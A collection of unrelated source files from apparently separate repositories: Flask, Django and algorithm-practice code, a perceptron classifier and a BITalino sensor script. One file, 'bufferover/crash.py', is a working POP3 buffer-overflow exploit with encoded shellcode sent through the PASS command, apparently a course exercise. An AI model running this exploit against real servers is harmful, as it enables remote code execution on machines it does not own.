mongo.db.tasks.update({"_id": ObjectId(task_id)}, submit)
flash("Task Successfully Updated")
task = mongo.db.tasks.find_one({"_id": ObjectId(task_id)})
categories = mongo.db.categories.find().sort("category_name", 1)
# take the user back to the same edit page
return render_template("edit_task.html", task=task, categories=categories)
@app.route("/delete_task/<task_id>")
def delete_task(task_id):
# get the specific task by the ObjectId
mongo.db.tasks.remove({"_id": ObjectId(task_id)})
flash("Task Successfully Deleted")
# redirect the user back to our primary function for the home page
return redirect(url_for("get_tasks"))
@app.route("/get_categories")
def get_categories():
categories = list(mongo.db.categories.find().sort("category_name", 1))
return render_template("categories.html", categories=categories)
@app.route("/add_category", methods=["GET", "POST"])
def add_category():
if request.method == "POST":
category = {
"category_name": request.form.get("category_name")
}
mongo.db.categories.insert_one(category)
flash("New Category Added")
return redirect(url_for("get_categories"))
return render_template("add_category.html")
@app.route("/edit_category/<category_id>", methods=["GET", "POST"])
def edit_category(category_id):
if request.method == "POST":
submit = {
"category_name": request.form.get("category_name")
}
mongo.db.categories.update({"_id": ObjectId(category_id)}, submit)
flash("Category Successfully Updated")
return redirect(url_for("get_categories"))
category = mongo.db.categories.find_one({"_id": ObjectId(category_id)})
return render_template("edit_category.html", category=category)
@app.route("/delete_category/<category_id>")
def delete_category(category_id):
mongo.db.categories.remove({"_id": ObjectId(category_id)})
flash("Category Successfully Deleted")
return redirect(url_for("get_categories"))
if __name__ == "__main__":
app.run(host=os.environ.get("IP"),
port=int(os.environ.get("PORT")),
debug=True) | [
"wiam.khairelsid@gmail.com"
] | wiam.khairelsid@gmail.com |
7c2557ffe34bf638b0ba6748b94a2d486ac85968 | ed709beb4ae2ae335f5d99f04cd122fac6c35d88 | /CODE/PYTHON/project.py | a37b95bacc71262a588283f99bc23571aa5a6c00 | [] | no_license | manuelrocha88/CherryPickISEPBITalinoPyExample | d4f9a867e00bd26d3ee319ee2dfbf23d63bc19bc | 6e7488672800021f2fdd36317ac18faf835b1183 | refs/heads/master | 2021-01-09T20:46:38.075698 | 2016-05-27T21:22:33 | 2016-05-27T21:22:33 | 59,861,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | import numpy
#Set bitalino Library. Can get it from github:
#https://github.com/BITalinoWorld/python-api ( http://bit.ly/BITalinoPyAPI )
import bitalino
#Set BITalino Mac Address
#macAddress = "20-15-12-22-97-57";
#If you have Apple Operating System Mac OS
#you have to use the virtual port instead
#run terminal command ls /dev/tty.*
#in order to check what is the
macAddress = "/dev/tty.BITalino-97-57-DevB"
#instanciate
device = bitalino.BITalino(macAddress)
# Read BITalino version
BITversion = device.version()
print "BITalino Version: ", BITversion
# Check if we are using version 1 or 2 of BITalino board
print "BITalino type: ", "2" if device.isBitalino2 else "1"
device.start(1000,[1])
i = 0
while i<100:
try:
dataAcquired = device.read(100)
EMG = dataAcquired[-1, :]
value = numpy.mean(abs(EMG - numpy.mean(EMG)))
print "v = ", value
if value > 150:
device.trigger([0, 1])
else:
device.trigger([0, 0])
i = i + 1
except KeyboardInterrupt:
break
device.close()
| [
"manuelrocha@manuelrocha.biz"
] | manuelrocha@manuelrocha.biz |
bfc39fecb86f2ae5c3caa848912510a68060bef6 | 18b7f6e6a64ff4e33202f4c647d33240bf8ce015 | /_AlgoStudy/20_0912/Baek_17070_3.py | 0c0a74e9fdd2d16d022ff6376f9d14404a65ade5 | [] | no_license | qorjiwon/LevelUp-Algorithm | 80734b88e2543fb4b6da48377bb31b70d972b448 | 62a71552427290361e6ade9dcfe3ffc90a9d86e2 | refs/heads/master | 2023-06-16T16:33:44.427818 | 2021-03-12T14:39:25 | 2021-03-12T14:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,938 | py | from sys import stdin
input = stdin.readline
# . → ↓ ↘
p_dirs = [[0, 1], [1, 0], [1, 1]]
ans = 0
from itertools import combinations
combinations()
def solution(y, x, p_type):
global ans
if y == N - 1 and x == N - 1:
ans += 1
return
# O(V*V) -> O(V*V*3^V)
for i, dirs in enumerate(p_dirs):
# (가로 -> 세로) or (세로 -> 가로)
if (i == 0 and p_type == 1) or (i == 1 and p_type == 0):
continue
# 다음에 놓으려는 파이프 (범위 벗어남 or 벽)
next_y = y + dirs[0]; next_x = x + dirs[1]
if next_y >= N or next_x >= N or MAP[next_y][next_x] == 1:
continue
# 대각선 파이프 못 놓는 경우
if i == 2 and (MAP[y][x + 1] == 1 or MAP[y + 1][x] == 1):
continue
solution(next_y, next_x, i)
def solution_2():
# 0. → 1. ↘ 2. ↓
dp[0][0][1] = 1
for i in range(2, N):
if MAP[0][i] == 0:
dp[0][0][i] = dp[0][0][i-1]
for r in range(1, N):
for c in range(1, N):
if MAP[r][c] == 0 and MAP[r][c-1] == 0 and MAP[r-1][c] == 0:
# ↘ = [이전 ↘] + [이전 →] + [이전 ↘]
dp[1][r][c] = dp[0][r-1][c-1] + dp[1][r-1][c-1] + dp[2][r-1][c-1]
if MAP[r][c] == 0:
# → = [이전 →] + [이전 ↘]
dp[0][r][c] = dp[0][r][c-1] + dp[1][r][c-1]
# ↓ = [이전 ↓] + [이전 ↘]
dp[2][r][c] = dp[2][r-1][c] + dp[1][r-1][c]
N = int(input())
MAP = [list(map(int, input().split())) for _ in range(N)]
if N <= 15:
solution(0, 1, 0)
print(ans)
else:
dp = [[[0 for _ in range(N)] for _ in range(N)] for _ in range(3)]
solution_2()
print(sum(dp[i][N-1][N-1] for i in range(3)))
"""
3
0 0 0
0 0 0
0 0 0
>
1
-------
4
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
>
3
""" | [
"21300035@handong.edu"
] | 21300035@handong.edu |
8c780606da24a7c15997a8036133511821b2f6bd | 231a05a0829d5407cf0fbbed81f92099239a5091 | /二分类/PLA.py | eafff36e71eb183b54219fcda61cc81c9edf0654 | [] | no_license | shiji203/Classification-and-Regression-Task | 3491474fe7cdf6f99e4bd40a41411848b69fb7e2 | 7090e6af850e443d5a309a1a6f2717fdab47323d | refs/heads/master | 2021-05-25T17:18:09.180721 | 2019-03-10T14:21:45 | 2019-03-10T14:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,919 | py | import numpy as np
import math
import csv
from pprint import pprint
def main():
file_name1 = '2/my_train.txt'
with open(file_name1, 'r', encoding='utf-8') as file1:
file1_list = file1.readlines()
train_size = len(file1_list)
train_list = []
weights = {}
for i in range(train_size):
tmp = file1_list[i].split()
for tmp1 in tmp:
weights[tmp1] = 1
train_list.append(tmp)
file_name3 = '2/my_train_label.txt'
with open(file_name3, 'r', encoding='utf-8') as file3:
label_list = file3.readlines()
cycles = 15 #迭代次数
alpha = 1.0 #学习率
for j in range(cycles):
correct_num = 0
print(j+1)
#随着迭代次数增加,不断减少学习率
alpha = alpha/(j+1)
for i in range(train_size):
tmp_list = train_list[i][:]
y = 0.0
#针对句子中的每个词,增加这个词对应的权值
for k in tmp_list:
y += (weights[k] * 1)
#如果y大于等于0,预测为1,y小于0,预测为0
if y >= 0.0:
sign_y = 1.0
else:
sign_y = 0.0
#如果预测结果正确,不更新权值
if sign_y == float(label_list[i]):
correct_num += 1
continue
#预测不正确,更新权值
else:
#如果结果为1,则更新值为1.0,否则为-1.0
if float(label_list[i]) == 1.0:
e = 1.0
else:
e = -1.0
#对每个词进行权值的更新
for k in tmp_list:
weights[k] = weights[k] + e*alpha
print(float(correct_num) / train_size)
file_name3 = '2/my_validation_label.txt'
with open(file_name3, 'r', encoding='utf-8') as file3:
label_list1 = file3.readlines()
file_name2 = '2/my_validation.txt'
with open(file_name2, 'r', encoding='utf-8') as file2:
file2_list = file2.readlines()
test_size = len(file2_list)
test_list = []
for i in range(test_size):
tmp = file2_list[i].split()
test_list.append(tmp)
accurate_number = 0
#遍历每一个句子,得到预测结果
for i in range(test_size):
tmp_list = test_list[i][:]
test_y = 0.0
#对于句子的每一词,如果存在对应的权值,直接相加
for k in tmp_list:
if k in weights.keys():
test_y += weights[k] * 1
#如果结果大于0,预测为1,否则预测为0
if test_y >= 0.0:
sign_y = 1.0
else:
sign_y = 0.0
if sign_y == float(label_list1[i]):
accurate_number += 1
print('Accuracy: ', str(float(accurate_number) / test_size))
if __name__ == "__main__":
main() | [
"1240945617@qq.com"
] | 1240945617@qq.com |
046ef434c325e090530784b9fadaaf68e9ea6f7e | cbfad345940367c7f35e508dd973fbf98230c356 | /blog/views.py | 78436afd963e8072a0d0d731f6d2e41886eaf77e | [] | no_license | HugoPHAM/my-first-blog | e84455d72eca612b1060b0cab6c808151a6f3301 | 2bcc588d44ad70177d650e1b991572c1de089652 | refs/heads/master | 2021-03-27T12:07:56.664634 | 2017-07-06T20:38:58 | 2017-07-06T20:38:58 | 95,473,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from .models import Post, PostForm
# Create your views here.
def post_list(request):
posts = Post.objects.filter(published_date__lte = timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts':posts})
def post_detail(request, pk):
post = get_object_or_404(Post, pk = pk)
return render(request, 'blog/post_detail.html', {'post': post})
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form': form})
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form}) | [
"hoanghung_inpg@yahoo.com"
] | hoanghung_inpg@yahoo.com |
4e2544889d6384c182513730ca865bc6991cba8b | 039f2c747a9524daa1e45501ada5fb19bd5dd28f | /ARC072/ARC072e.py | 6c8323480dc2db7390ec0225789b19ad0f8a7a1e | [
"Unlicense"
] | permissive | yuto-moriizumi/AtCoder | 86dbb4f98fea627c68b5391bf0cc25bcce556b88 | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | refs/heads/master | 2023-03-25T08:10:31.738457 | 2021-03-23T08:48:01 | 2021-03-23T08:48:01 | 242,283,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | #ARC072e
def main():
import sys
input=sys.stdin.readline
sys.setrecursionlimit(10**6)
if __name__ == '__main__':
main() | [
"kurvan1112@gmail.com"
] | kurvan1112@gmail.com |
78b5b9400c19ab5e66367450ac516988019f5938 | 426784c07a624f461f8da6657f658207b39bd2bb | /prob2.py | 3efc6677038ed22a8ffd35c6e772d05c99952b1d | [
"Giftware"
] | permissive | a-jennings/MIT6.00.1x-Pset4 | 4320162e02a46b15ec275daca44b568cc04eb9f1 | ea80d1b4b10de5589725fa99f3f9013122de29ad | refs/heads/master | 2020-12-02T23:54:55.360062 | 2017-07-07T18:53:12 | 2017-07-07T18:53:12 | 95,961,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 792 | py | def updateHand(hand, word):
"""
Assumes that 'hand' has all the letters in word.
In other words, this assumes that however many times
a letter appears in 'word', 'hand' has at least as
many of that letter in it.
Updates the hand: uses up the letters in the given word
and returns the new hand, without those letters in it.
Has no side effects: does not modify hand.
word: string
hand: dictionary (string -> int)
returns: dictionary (string -> int)
"""
string = hand.copy()
for char in word:
try:
string[char] -= 1
except KeyError:
string[char] = 0
return string
#Testing below
hand = {'a':1, 'q':1, 'l':2, 'm':1, 'u':1, 'i':1}
word = 'quail'
print(updateHand(hand,word))
| [
"andrew_jennings@ymail.com"
] | andrew_jennings@ymail.com |
a5c842cde04279f715099f22659e1036fe9fc592 | aced737167d197371846c04a30003d5ee5087b0a | /my_app/models.py | 99813378e375a6fff7ee3a85b3462fb2ec6ea6e4 | [] | no_license | VasantaVanan/BloodBank-Django | 76a04cf5addf355ed528415eafe1dd0f13658914 | 3cca263380446307d43762a294a97f33a353de60 | refs/heads/master | 2023-08-27T10:37:44.913672 | 2021-10-07T08:00:40 | 2021-10-07T08:00:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | from django.db import models
# Create your models here.
class Doner(models.Model):
name = models.CharField(max_length=30)
blood_group = models.CharField(max_length=15)
age = models.IntegerField(default=18)
address = models.TextField()
contact_no = models.IntegerField()
| [
"vasantavanan.r.2018.cse@ritchennai.edu.in"
] | vasantavanan.r.2018.cse@ritchennai.edu.in |
ef2be261d2e628e655f60d7e4701b4548864f468 | ceacaece7d31ddc3927f1acf10b96acb871d4bff | /front_comments/urls.py | 68544a505149a871c58fe8d51619ffbd164e58ce | [] | no_license | degreework/Front | a1ae8b02de93fac48bbe1af3c3e533ebbad8814d | 34c35526c574538fbd6146582f6fa73983449605 | refs/heads/master | 2021-06-01T10:07:19.153564 | 2015-12-11T03:35:38 | 2015-12-11T03:35:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^$', 'front_users.views.index', name='index'),
url(r'^recoverPassword/$', 'front_users.views.recoverPassword', name='recoverPassword'),
url(r'^changePassword/$', 'front_users.views.changePassword', name='changePassword'),
url(r'^profile/$', 'front_users.views.profile', name='profile'),
url(r'^settings/$', 'front_users.views.settings', name='settings'),
)
| [
"donberna-93@hotmail.com"
] | donberna-93@hotmail.com |
3804592230add3e1e8bfcc31cec67fc5bc25cbb9 | 21e74dc4bd4de29713027103dd3e8c416fd41c3d | /bufferover/crash.py | e8e478fe7278b8ca99e61495cd5e4ccd85836a22 | [] | no_license | trollzim/Curso | c2c905630635ef4fa50839dd9d0cdc9605f28f84 | 6b0cb930c855d02ce73cb2c6bf1e7350288122dc | refs/heads/master | 2021-01-24T03:12:38.523716 | 2018-02-25T22:13:37 | 2018-02-25T22:13:37 | 122,882,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,053 | py | #!/usr/bin/python
import socket,sys
buf = ""
buf += "\xbb\x4a\xf9\xd2\x38\xdb\xc7\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x52\x83\xc6\x04\x31\x5e\x0e\x03\x14\xf7\x30"
buf += "\xcd\x54\xef\x37\x2e\xa4\xf0\x57\xa6\x41\xc1\x57\xdc"
buf += "\x02\x72\x68\x96\x46\x7f\x03\xfa\x72\xf4\x61\xd3\x75"
buf += "\xbd\xcc\x05\xb8\x3e\x7c\x75\xdb\xbc\x7f\xaa\x3b\xfc"
buf += "\x4f\xbf\x3a\x39\xad\x32\x6e\x92\xb9\xe1\x9e\x97\xf4"
buf += "\x39\x15\xeb\x19\x3a\xca\xbc\x18\x6b\x5d\xb6\x42\xab"
buf += "\x5c\x1b\xff\xe2\x46\x78\x3a\xbc\xfd\x4a\xb0\x3f\xd7"
buf += "\x82\x39\x93\x16\x2b\xc8\xed\x5f\x8c\x33\x98\xa9\xee"
buf += "\xce\x9b\x6e\x8c\x14\x29\x74\x36\xde\x89\x50\xc6\x33"
buf += "\x4f\x13\xc4\xf8\x1b\x7b\xc9\xff\xc8\xf0\xf5\x74\xef"
buf += "\xd6\x7f\xce\xd4\xf2\x24\x94\x75\xa3\x80\x7b\x89\xb3"
buf += "\x6a\x23\x2f\xb8\x87\x30\x42\xe3\xcf\xf5\x6f\x1b\x10"
buf += "\x92\xf8\x68\x22\x3d\x53\xe6\x0e\xb6\x7d\xf1\x71\xed"
buf += "\x3a\x6d\x8c\x0e\x3b\xa4\x4b\x5a\x6b\xde\x7a\xe3\xe0"
buf += "\x1e\x82\x36\xa6\x4e\x2c\xe9\x07\x3e\x8c\x59\xe0\x54"
buf += "\x03\x85\x10\x57\xc9\xae\xbb\xa2\x9a\x10\x93\xad\x5c"
buf += "\xf9\xe6\xad\x61\x42\x6f\x4b\x0b\xa4\x26\xc4\xa4\x5d"
buf += "\x63\x9e\x55\xa1\xb9\xdb\x56\x29\x4e\x1c\x18\xda\x3b"
buf += "\x0e\xcd\x2a\x76\x6c\x58\x34\xac\x18\x06\xa7\x2b\xd8"
buf += "\x41\xd4\xe3\x8f\x06\x2a\xfa\x45\xbb\x15\x54\x7b\x46"
buf += "\xc3\x9f\x3f\x9d\x30\x21\xbe\x50\x0c\x05\xd0\xac\x8d"
buf += "\x01\x84\x60\xd8\xdf\x72\xc7\xb2\x91\x2c\x91\x69\x78"
buf += "\xb8\x64\x42\xbb\xbe\x68\x8f\x4d\x5e\xd8\x66\x08\x61"
buf += "\xd5\xee\x9c\x1a\x0b\x8f\x63\xf1\x8f\xbf\x29\x5b\xb9"
buf += "\x57\xf4\x0e\xfb\x35\x07\xe5\x38\x40\x84\x0f\xc1\xb7"
buf += "\x94\x7a\xc4\xfc\x12\x97\xb4\x6d\xf7\x97\x6b\x8d\xd2"
bytes = "A"*2606 + "\x20\x10\xB4\x7C" + "\x90" * (390-351) + buf
#2606
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5",110))
r = s.recv(1024)
print r
s.send("USER teste\r\n")
r=s.recv(1024)
print r
s.send("PASS "+bytes+"\r\n")
r=s.recv(1024)
print r
except:
print "Erro ao conectar"
| [
"trolljoker01@gmail.com"
] | trolljoker01@gmail.com |
db48875d910abc70a67192d5f64a6031d1d0a335 | 54d8a05e0238e96eb43e4893bacba024e490bf11 | /python-projects/algo_and_ds/find_kth_bit_leetcode1545.py | a428393836935d26f23aacb98f3719b4b22816fc | [] | no_license | infinite-Joy/programming-languages | 6ce05aa03afd7edeb0847c2cc952af72ad2db21e | 0dd3fdb679a0052d6d274d19040eadd06ae69cf6 | refs/heads/master | 2023-05-29T10:34:44.075626 | 2022-07-18T13:53:02 | 2022-07-18T13:53:02 | 30,753,185 | 3 | 5 | null | 2023-05-22T21:54:46 | 2015-02-13T11:14:25 | Jupyter Notebook | UTF-8 | Python | false | false | 1,324 | py | """
https://leetcode.com/contest/weekly-contest-201/problems/find-kth-bit-in-nth-binary-string/
S1 = "0"
Si = Si-1 + "1" + reverse(invert(Si-1)) for i > 1
0
0 1 1
011 1 001
0111001 1 0110001
time complexity : k.log(fac(k))
num = 0, size = 1
k = 2, num << size + 1 + 1 <1 + , size = size*2 + 1 = 3
k = 3, num << size +1 + 1 << size + (~num), size = size * 2 + 1 = 7
finally once full k is reached. find the nth bit, num >> (n-1), num & 1
"""
from math import log
def reverse(n):
rev = 0
while n > 0:
rev = rev << 1
if n & 1 == 1:
rev ^= 1
n = n >> 1
return rev
def invert(n):
bits = int(log(n, 2)) + 1
ones = 2 ** bits - 1
return n ^ ones
def print_bin(val):
print(bin(val))
def main(n, k):
num = 0b0
size = 1
i = 1
while i < n:
prev = num << (size + 1)
print_bin(prev)
middle = 1 << size
print_bin(middle)
if num > 0:
last = invert(reverse(num)) << 1
last = last + 1
else:
last = 1
print_bin(last)
num = prev + middle + last
i += 1
size = 2 * size + 1
print(bin(num))
print("%"*10)
val = num >> (size - k)
return val & 1
print(main(3, 1))
print(main(4, 11))
print(main(1, 1))
print(main(2, 3))
| [
"joydeepubuntu@gmail.com"
] | joydeepubuntu@gmail.com |
3c209b9c3051bc6907a42ee90b048a14513b0d2a | 5f89f95fabb7a9d41d023ac1e7451fbf74c57c15 | /Fonctionnels/Méthodes prédéfinies !/Logging (3).py | c548aa5a2010d7c6b69e7718606165cf46d69d6f | [] | no_license | MINCARELLI13/Fonctionnels | 4ed5f439dae3032d5941eb0a61706ca472dd6a3c | d074c56bac0beebd118c525777e53be7035fd09a | refs/heads/master | 2023-03-08T21:43:02.290575 | 2021-02-28T21:49:38 | 2021-02-28T21:49:38 | 343,183,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 593 | py | # -*- coding: utf8 -*-
#!/usr/bin/python
import logging
# Le but du module "logging" est de remplacer le fameux teste "print("...")" mais en étant plus précis
# Pour cela, il y a 5 niveaux de messages : Debug, Info, Warning, Error, Critical
# on configure le module pour qu'il affiche tous les messages à partir de "Debug"
# (par défaut, il n'affiche rien en-dessous de "Warning")
logging.basicConfig(level=logging.DEBUG)
logging.warning("coin") # on affiche le résultat "coin" mais en mode "Warning"
logging.debug("pan !") # on affiche le résultat "pan !" en mode "Debug" | [
"sancho.poncho@laposte.net"
] | sancho.poncho@laposte.net |
2e6a81b0bc27a5aceceef63f2ba3c6c6c0db7f9f | b4eccda5955c2efb70a079a935db7e1d1e47bd72 | /build/mbot_navigation_gazebo/catkin_generated/pkg.develspace.context.pc.py | 22f32bce07f4460e26379c71d863fc6af4a1e49f | [] | no_license | huangyouhua/mc_ws | afc173571299ca50dba5f795d59b623a8dcd12a1 | 2262978fbab6e735270dc52ee36b22b9f6a3bcf7 | refs/heads/master | 2021-02-23T05:19:48.914956 | 2020-12-10T08:32:11 | 2020-12-10T08:32:11 | 245,393,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "mbot_navigation_gazebo"
PROJECT_SPACE_DIR = "/home/hyh/mc_ws/devel"
PROJECT_VERSION = "0.0.0"
| [
"1356795413@qq.com"
] | 1356795413@qq.com |
6e5f3bdcc012780b0112dbd48d8ab276bc348448 | 6206ad73052b5ff1b6690c225f000f9c31aa4ff7 | /Code/Design In-Memory File System.py | 9f880f3a935944388209a4752ec45afd1d1d48dd | [] | no_license | mws19901118/Leetcode | 7f9e3694cb8f0937d82b6e1e12127ce5073f4df0 | 752ac00bea40be1e3794d80aa7b2be58c0a548f6 | refs/heads/master | 2023-09-01T10:35:52.389899 | 2023-09-01T03:37:22 | 2023-09-01T03:37:22 | 21,467,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,458 | py | class TreeNode: #Tree node to store file or directory.
def __init__(self, isFile: bool):
self.content = "" if isFile else None #Content is empty string initially if node is file; otherwise is none.
self.children = None if isFile else {} #Children is empty dictionary initially if not is directory; otherwise is none.
class FileSystem:
def __init__(self): #Initialize root for file system tree.
self.root = TreeNode(False)
def ls(self, path: str) -> List[str]:
segments = self.parse(path) #Parse path.
node = self.root
for x in segments: #Traverse file system tree to find the last node of path.
node = node.children[x]
return [segments[-1]] if node.content else sorted(node.children.keys()) #Return the file name as list if node is file; otherwise, return the sorted keys in children.
def mkdir(self, path: str) -> None:
segments = self.parse(path) #Parse path.
node = self.root
for x in segments: #Traverse file system tree.
if x not in node.children: #If current directory not exist, create it.
node.children[x] = TreeNode(False)
node = node.children[x]
def addContentToFile(self, filePath: str, content: str) -> None:
segments = self.parse(filePath) #Parse filePath.
node = self.root
for x in segments[:-1]: #Traverse file system tree to find the parent directory of file.
node = node.children[x]
if segments[-1] not in node.children: #If file not exist, create a file node at the filePath.
node.children[segments[-1]] = TreeNode(True)
node.children[segments[-1]].content += content #Append content to file.
def readContentFromFile(self, filePath: str) -> str:
segments = self.parse(filePath) #Parse filePath.
node = self.root #Traverse file system tree to find file.
for x in segments:
node = node.children[x]
return node.content #Return content.
def parse(self, path: str) -> List[str]: #Parse the path to segements.
return [] if path == "/" else path.split('/')[1:] #If path is root, return empty list; otherwise, return path.split('/')[1:].
# Your FileSystem object will be instantiated and called as such:
# obj = FileSystem()
# param_1 = obj.ls(path)
# obj.mkdir(path)
# obj.addContentToFile(filePath,content)
# param_4 = obj.readContentFromFile(filePath)
| [
"noreply@github.com"
] | mws19901118.noreply@github.com |
4aa007b29f67e4b0976b53dd51de2d33c3362154 | 524f1a38c7316d88801d3ec40e00ffba44785ca5 | /fdep/__init__.py | 8694da177bebdaa37c421ab66f253f19ba55edf4 | [
"MIT"
] | permissive | checkr/fdep | e6bc6ce2b631f1d69c58f4b7ad02b4170a0af3bb | 36fba98e6b3af35adf238c61f700a8138c090a5e | refs/heads/master | 2021-01-19T11:32:28.673210 | 2019-10-30T02:16:03 | 2019-10-30T02:16:03 | 69,920,017 | 9 | 0 | MIT | 2019-10-30T02:16:05 | 2016-10-03T23:40:01 | Python | UTF-8 | Python | false | false | 22 | py | __VERSION__ = '0.2.9'
| [
"noreply@github.com"
] | checkr.noreply@github.com |
3e2ac1d8435684f35ad6bf1ceb0da06711ba9eb3 | 950872a24638b20e4e131f50666d416b3efd4e71 | /makevue/__init__.py | 54a8a8e69c52eb3c4a188c545af1eebe82be6522 | [] | no_license | lleej/django-study | 1cffea877e2a37ffd8d601958450c5f48023dbf1 | 76b1f628f9a81eb28e8b49b07be8cd42745363bf | refs/heads/master | 2020-07-05T16:34:09.770409 | 2019-08-21T00:47:23 | 2019-08-21T00:47:23 | 202,700,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | __AUTHOR__ = 'lleej@qq.com'
__VERSION__ = '1.0.0'
| [
"lijie@boco.com.cn"
] | lijie@boco.com.cn |
f4372a6ec8497939240a4ac5878e45b079536c9f | fa124fdbf36327bf8e74bbc7f00ce448c1e7939a | /src/com/rwanda/mch/model/stock.py | 9a01b8acc42e78dc4aa3c40a04ad5e93b1f0e7c6 | [] | no_license | pivotaccess2007/mch | 039f17cdb16b434c0a25504cc81b7db81e5da988 | 523d1cd706296744e17e85683b5dbedbc05dd9e6 | refs/heads/master | 2020-03-30T16:33:44.451275 | 2018-10-03T13:23:00 | 2018-10-03T13:23:00 | 151,414,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,547 | py | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
##
##
## @author UWANTWALI ZIGAMA Didier
## d.zigama@pivotaccess.com/zigdidier@gmail.com
##
__author__="Zigama Didier"
__date__ ="$Nov 22, 2017 1:29:30 PM$"
from model.rsmsrwobj import RSMSRWObj
from util.record import fetch_summary, fetch_table, fetch_table_by_location, filter_data, fetch_report, fetch_resource, migrate
from exception.mch_critical_error import MchCriticalError
from service.stock.metrics import DRUGS
from util.mch_util import parse_codes
class Stock(RSMSRWObj):
"""A stock report of RapidSMS. Stock have the
following properties:
Attributes: TODO
"""
_table = 'stock'
def __init__(self, telephone):
"""Return a stock object which telephone is *telephone* """
self.telephone = telephone
self.table = Stock._table
@staticmethod
def fetch_stock(cnds, cols, exts):
return fetch_summary(Stock._table, cnds, cols, exts)
@staticmethod
def fetch_log_stock(cnds, cols):
return fetch_table(Stock._table, cnds, cols)
@staticmethod
def fetch_stock_by_location(cnds, group_by = [], INDICS = []):
data = []; print cnds, group_by, INDICS
for INDIC in INDICS:
#print "CNDS: ", cnds
cols = group_by + ['COUNT (*) AS %s' % INDIC[0]]
curr_cnds = {INDIC[1]: ''}
if INDIC[1] == 'total':
cols = group_by + ['COUNT (*) AS %s' % INDIC[0]]
curr_cnds = {}
curr_cnds.update(cnds)
#print cols
data.append(fetch_table_by_location(Stock._table, curr_cnds, cols, group_by))
return data
@staticmethod
def get_report_drugs(pk):
message = ""
try:
record = fetch_report(Stock._table, pk)
report = fetch_resource(code = record.keyword)
message = parse_codes(report, record, CODES = DRUGS)
except Exception,e :
#print e
pass
return message
@staticmethod
def get_report_details(pk):
message = ""
try:
record = fetch_report(Stock._table, pk)
return record.message
report = fetch_resource(code = record.keyword)
message = "Report: %(keyword)s, DRUGS: %(drugs)s" % {'keyword': record.keyword,
'drugs': parse_codes(report, record, CODES = DRUGS)}
except Exception,e :
#print e
pass
return message
| [
"zigdidier@gmail.com"
] | zigdidier@gmail.com |
2a72fdb2b9ab42a9a56b66989676e31153d5bacc | 64b2a2771f60defc930e848c3579b44c8de31a12 | /excel_temp.py | 39a41758f0eef5e1782e07aa6b22f89d04c1cb2d | [] | no_license | GemjuSherpa/Asignment | 220fbcff25dbcbe85ec5f395cc67b71dde0d0cbe | da18ceb3c81453dbd202aadd67d6f9c47365c979 | refs/heads/master | 2020-04-13T01:19:04.581451 | 2018-01-12T14:26:24 | 2018-01-12T14:26:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | # #!/bin/Python
# Filename: excel_temp.py
# Author: Gemju Sherpa
import openpyxl
import sqlite3
# Sqlite3: connect to db and query the result.
connection = sqlite3.connect("globaltemperature.db")
cursor = connection.cursor()
sql = """
SELECT City, STRFTIME('%Y', Date), Average_Temp
FROM Bycity
WHERE Country = 'China'
ORDER BY STRFTIME('%Y', Date);
"""
cursor.execute(sql)
cities = []
cities.append(cursor.fetchall())
year = []
temp = []
city = []
for lists in cities:
for i in lists:
year.append(i[1]) #extract the year lists
temp.append(i[2]) #extract the temp lists
city.append(i[0])
data = list(zip(year, temp)) # create a dictionaries k, v -> year, temp
d = {}
for k, v in data:
d.setdefault(k, []).append(v) # combine dictionaries values together forming a lists as k, v ->year, lists of temp
values = [] #lists of Values which is temperature
keys = [] # lists if keys which is year
for k, v in d.items():
values.append(v)
keys.append(k)
valuesfloat = [] # lists of values converted to floats
mean = []
for j in values:
valuesfloat.append([float(i) for i in j if i != "None"]) # eliminate the None values
for value in valuesfloat:
mean.append(sum(value)/len(valuesfloat)) # calculate the mean temp for each year
year_mean = dict(zip(keys, mean)) # dictionaries with k,v ->year, mean_temp
city_year = dict(zip(keys, city)) # dictionaries with k,v -> year, cities
# merge a two dictionaries together so that k, v -> year, [mean, cities]
d2 = {}
for key in set(year_mean.keys()):
try:
d2.setdefault(key, []).append(year_mean[key])
except KeyError:
pass
try:
d2.setdefault(key, []).append(city_year[key])
except KeyError:
pass
## Now, create a workbook and worksheet and save the data from d2
wb = openpyxl.Workbook()
